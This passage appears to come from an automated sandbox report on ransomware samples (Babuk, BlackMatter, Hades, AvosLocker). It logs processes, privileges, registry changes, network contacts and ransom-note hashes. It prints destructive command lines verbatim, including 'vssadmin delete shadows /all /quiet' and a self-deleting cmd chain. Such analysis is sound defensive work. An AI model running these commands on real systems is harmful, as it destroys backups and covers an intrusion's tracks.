N/A	N/A	C:\Windows\system32\vssadmin.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 4288 wrote to memory of 4552	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	C:\Windows\System32\cmd.exe
PID 4288 wrote to memory of 4552	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	C:\Windows\System32\cmd.exe
PID 4552 wrote to memory of 836	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 4552 wrote to memory of 836	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 4288 wrote to memory of 4344	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	C:\Windows\System32\cmd.exe
PID 4288 wrote to memory of 4344	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe	C:\Windows\System32\cmd.exe
PID 4344 wrote to memory of 1408	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 4344 wrote to memory of 1408	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	28.118.140.52.in-addr.arpa	udp
US	8.8.8.8:53	172.210.232.199.in-addr.arpa	udp
US	8.8.8.8:53	23.159.190.20.in-addr.arpa	udp
US	8.8.8.8:53	43.58.199.20.in-addr.arpa	udp
US	8.8.8.8:53	157.123.68.40.in-addr.arpa	udp
US	8.8.8.8:53	171.39.242.20.in-addr.arpa	udp
US	8.8.8.8:53	147.142.123.92.in-addr.arpa	udp
US	8.8.8.8:53	183.142.211.20.in-addr.arpa	udp
US	8.8.8.8:53	240.143.123.92.in-addr.arpa	udp
US	8.8.8.8:53	88.156.103.20.in-addr.arpa	udp
US	8.8.8.8:53	11.227.111.52.in-addr.arpa	udp
US	8.8.8.8:53	tse1.mm.bing.net	udp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	8.8.8.8:53	10.28.171.150.in-addr.arpa	udp

Files

C:\Users\Admin\How To Restore Your Files.txt

MD5	81fc4c91a0938482f65a72216cda1e39
SHA1	3fb3d27ceb1502ddf0d68fa9251a6aec46036377
SHA256	59ac7c1a064a53196eb135e59ab7b658577fd2ad22b45a02b77f1df630912591
SHA512	ef34299b9f48c9362fadd6da53ef4c57a5d4b3cb95e35ad5be24f51249e8bbd5a5df519065212f120897461f7360c415c20dcebd74a29221086208d8f8d6d1f4

Analysis: behavioral12

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

137s

Max time network

168s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

Signatures

BlackMatter Ransomware

ransomware blackmatter

Renames multiple (152) files with added filename extension

ransomware

Sets desktop wallpaper using registry

ransomware

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\pqIiT08io.bmp"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\pqIiT08io.bmp"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A

Modifies Control Panel

evasion

Description	Indicator	Process	Target
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\Desktop	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\Desktop\WallpaperStyle = "10"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeBackupPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: 36	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeImpersonatePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: 33	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	228.249.119.40.in-addr.arpa	udp
US	8.8.8.8:53	172.210.232.199.in-addr.arpa	udp
US	8.8.8.8:53	g.bing.com	udp
US	13.107.21.237:443	g.bing.com	tcp
US	8.8.8.8:53	237.21.107.13.in-addr.arpa	udp
US	8.8.8.8:53	136.32.126.40.in-addr.arpa	udp
US	8.8.8.8:53	43.58.199.20.in-addr.arpa	udp
US	8.8.8.8:53	paymenthacks.com	udp
US	204.11.56.48:443	paymenthacks.com	tcp
US	8.8.8.8:53	133.211.185.52.in-addr.arpa	udp
US	8.8.8.8:53	183.142.211.20.in-addr.arpa	udp
US	204.11.56.48:80	paymenthacks.com	tcp
US	8.8.8.8:53	mojobiden.com	udp
US	3.33.130.190:443	mojobiden.com	tcp
US	8.8.8.8:53	157.123.68.40.in-addr.arpa	udp
US	8.8.8.8:53	171.39.242.20.in-addr.arpa	udp
US	8.8.8.8:53	48.56.11.204.in-addr.arpa	udp
US	3.33.130.190:80	mojobiden.com	tcp
US	204.11.56.48:443	paymenthacks.com	tcp
US	8.8.8.8:53	190.130.33.3.in-addr.arpa	udp
US	8.8.8.8:53	41.249.124.192.in-addr.arpa	udp
US	8.8.8.8:53	147.142.123.92.in-addr.arpa	udp
US	204.11.56.48:80	paymenthacks.com	tcp
US	3.33.130.190:443	mojobiden.com	tcp
US	3.33.130.190:80	mojobiden.com	tcp
US	8.8.8.8:53	240.143.123.92.in-addr.arpa	udp
US	8.8.8.8:53	26.35.223.20.in-addr.arpa	udp
US	8.8.8.8:53	29.243.111.52.in-addr.arpa	udp
US	8.8.8.8:53	tse1.mm.bing.net	udp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp

Files

memory/4948-1-0x0000000002DA0000-0x0000000002DB0000-memory.dmp

memory/4948-0-0x0000000002DA0000-0x0000000002DB0000-memory.dmp

C:\pqIiT08io.README.txt

MD5	f66968c47a64569e2281f65a95991be0
SHA1	ef9e3e80bfbea4c3021b226cb8cd00687013b8a8
SHA256	4b950c763006e7c4569df8742855cec31bf82f835bd7e2bdcb5f128db34c82bf
SHA512	cb4ace1b3e891ab100b3950c6bc133b216e91c8978a3af1ffd75617b606bb7ceb0133f44d37a30a827655e5b84b016d736a732f5f37635bb727e1a5b722cad24

memory/4948-226-0x0000000002DA0000-0x0000000002DB0000-memory.dmp

memory/4948-225-0x0000000002DA0000-0x0000000002DB0000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win7-20240705-en

Max time kernel

118s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

Signatures

Hades Ransomware

ransomware hades

Hades payload

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

CryptOne packer

cryptone packer

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A

Renames multiple (260) files with added filename extension

ransomware

Deletes itself

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\cmd.exe	N/A

Executes dropped EXE

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion	N/A

Loads dropped DLL

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 2576 wrote to memory of 2592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe	C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion
PID 2576 wrote to memory of 2592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe	C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion
PID 2576 wrote to memory of 2592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe	C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion
PID 2592 wrote to memory of 2524	N/A	C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion	C:\Windows\system32\cmd.exe
PID 2592 wrote to memory of 2524	N/A	C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion	C:\Windows\system32\cmd.exe
PID 2592 wrote to memory of 2524	N/A	C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion	C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 2512	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe	C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 2512	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe	C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 2512	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe	C:\Windows\system32\cmd.exe
PID 2512 wrote to memory of 540	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\waitfor.exe
PID 2512 wrote to memory of 540	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\waitfor.exe
PID 2512 wrote to memory of 540	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\waitfor.exe
PID 2524 wrote to memory of 2284	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\waitfor.exe
PID 2524 wrote to memory of 2284	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\waitfor.exe
PID 2524 wrote to memory of 2284	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\waitfor.exe
PID 2512 wrote to memory of 808	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\attrib.exe
PID 2512 wrote to memory of 808	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\attrib.exe
PID 2512 wrote to memory of 808	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\attrib.exe
PID 2524 wrote to memory of 2224	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\attrib.exe
PID 2524 wrote to memory of 2224	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\attrib.exe
PID 2524 wrote to memory of 2224	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\attrib.exe	N/A
N/A	N/A	C:\Windows\system32\attrib.exe	N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion

C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion /go

C:\Windows\system32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion" & del "C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion" & rd "C:\Users\Admin\AppData\Roaming\EnterpriseDraw\"

C:\Windows\system32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & del "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & rd "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\"

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion"

Network

N/A

Files

memory/2576-0-0x0000000001B30000-0x0000000001CF2000-memory.dmp

memory/2576-1-0x0000000140000000-0x00000001401E2000-memory.dmp

\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion

MD5	9fa1ba3e7d6e32f240c790753cdaaf8e
SHA1	7bcea3fbfcb4c170c57c9050499e1fae40f5d731
SHA256	fe997a590a68d98f95ac0b6c994ba69c3b2ece9841277b7fecd9dfaa6f589a87
SHA512	8d2fb58cb8776ead15f445671431eae13a00b48921e545c7ecbf91829015d818d663d9369f181de669ebb771b113c2f675c3a156fac5ede019b5fad9cb8c65fe

memory/2592-12-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/2592-11-0x0000000001B60000-0x0000000001D22000-memory.dmp

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\HOW-TO-DECRYPT-gn9cj.txt

MD5	0c6d0a67b942d06fe27f41c7c582cdfe
SHA1	7e674cf6375b138cabca2706583d4ced7a1aef27
SHA256	014ea5effc97085b7832512b9ad2a5c4487265eb67e8d7b0920ef2bc8768400c
SHA512	53ec4509bc58f53419a8923d808c7dfdecf57dc203c37265d061aebab73147720d1c419e79578065a42c3b2a63504370f90516c3f0afad5d6997952592d3a39c

memory/2576-478-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/2592-501-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/2592-542-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/2592-543-0x0000000001B60000-0x0000000001D22000-memory.dmp

memory/2576-545-0x0000000001B30000-0x0000000001CF2000-memory.dmp

memory/2576-544-0x0000000140000000-0x00000001401E2000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win10v2004-20240709-en

Max time kernel

141s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

Signatures

Hades Ransomware

ransomware hades

Hades payload

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

CryptOne packer

cryptone packer

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A

Renames multiple (167) files with added filename extension

ransomware

Executes dropped EXE

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Roaming\KglWindows\Event	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 412 wrote to memory of 5116	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe	C:\Users\Admin\AppData\Roaming\KglWindows\Event
PID 412 wrote to memory of 5116	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe	C:\Users\Admin\AppData\Roaming\KglWindows\Event
PID 5116 wrote to memory of 4988	N/A	C:\Users\Admin\AppData\Roaming\KglWindows\Event	C:\Windows\SYSTEM32\cmd.exe
PID 5116 wrote to memory of 4988	N/A	C:\Users\Admin\AppData\Roaming\KglWindows\Event	C:\Windows\SYSTEM32\cmd.exe
PID 412 wrote to memory of 4780	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe	C:\Windows\SYSTEM32\cmd.exe
PID 412 wrote to memory of 4780	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe	C:\Windows\SYSTEM32\cmd.exe
PID 4988 wrote to memory of 1284	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\system32\waitfor.exe
PID 4988 wrote to memory of 1284	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\system32\waitfor.exe
PID 4988 wrote to memory of 3200	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\system32\attrib.exe
PID 4988 wrote to memory of 3200	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\system32\attrib.exe
PID 4780 wrote to memory of 5008	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\system32\waitfor.exe
PID 4780 wrote to memory of 5008	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\system32\waitfor.exe
PID 4780 wrote to memory of 3176	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\system32\attrib.exe
PID 4780 wrote to memory of 3176	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\attrib.exe	N/A
N/A	N/A	C:\Windows\system32\attrib.exe	N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

C:\Users\Admin\AppData\Roaming\KglWindows\Event

C:\Users\Admin\AppData\Roaming\KglWindows\Event /go

C:\Windows\SYSTEM32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\KglWindows\Event" & del "C:\Users\Admin\AppData\Roaming\KglWindows\Event" & rd "C:\Users\Admin\AppData\Roaming\KglWindows\"

C:\Windows\SYSTEM32\cmd.exe

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Roaming\KglWindows\Event"

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	154.239.44.20.in-addr.arpa	udp
US	8.8.8.8:53	172.210.232.199.in-addr.arpa	udp
US	8.8.8.8:53	22.160.190.20.in-addr.arpa	udp
US	8.8.8.8:53	133.211.185.52.in-addr.arpa	udp
US	8.8.8.8:53	26.35.223.20.in-addr.arpa	udp
US	8.8.8.8:53	157.123.68.40.in-addr.arpa	udp
US	8.8.8.8:53	171.39.242.20.in-addr.arpa	udp
US	8.8.8.8:53	13.227.111.52.in-addr.arpa	udp
US	8.8.8.8:53	tse1.mm.bing.net	udp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp

Files

memory/412-0-0x0000000002080000-0x0000000002242000-memory.dmp

memory/412-1-0x0000000140000000-0x00000001401E2000-memory.dmp

C:\Users\Admin\AppData\Roaming\KglWindows\Event

MD5	9fa1ba3e7d6e32f240c790753cdaaf8e
SHA1	7bcea3fbfcb4c170c57c9050499e1fae40f5d731
SHA256	fe997a590a68d98f95ac0b6c994ba69c3b2ece9841277b7fecd9dfaa6f589a87
SHA512	8d2fb58cb8776ead15f445671431eae13a00b48921e545c7ecbf91829015d818d663d9369f181de669ebb771b113c2f675c3a156fac5ede019b5fad9cb8c65fe

memory/412-8-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/412-10-0x0000000002080000-0x0000000002242000-memory.dmp

memory/5116-12-0x0000000002010000-0x00000000021D2000-memory.dmp

memory/5116-11-0x0000000140000000-0x00000001401E2000-memory.dmp

C:\Users\Admin\Desktop\HOW-TO-DECRYPT-gn9cj.txt

MD5	0c6d0a67b942d06fe27f41c7c582cdfe
SHA1	7e674cf6375b138cabca2706583d4ced7a1aef27
SHA256	014ea5effc97085b7832512b9ad2a5c4487265eb67e8d7b0920ef2bc8768400c
SHA512	53ec4509bc58f53419a8923d808c7dfdecf57dc203c37265d061aebab73147720d1c419e79578065a42c3b2a63504370f90516c3f0afad5d6997952592d3a39c

memory/5116-358-0x0000000002010000-0x00000000021D2000-memory.dmp

memory/5116-357-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/412-359-0x0000000140000000-0x00000001401E2000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win7-20240708-en

Max time kernel

121s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Renames multiple (81) files with added filename extension

ransomware

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe	N/A
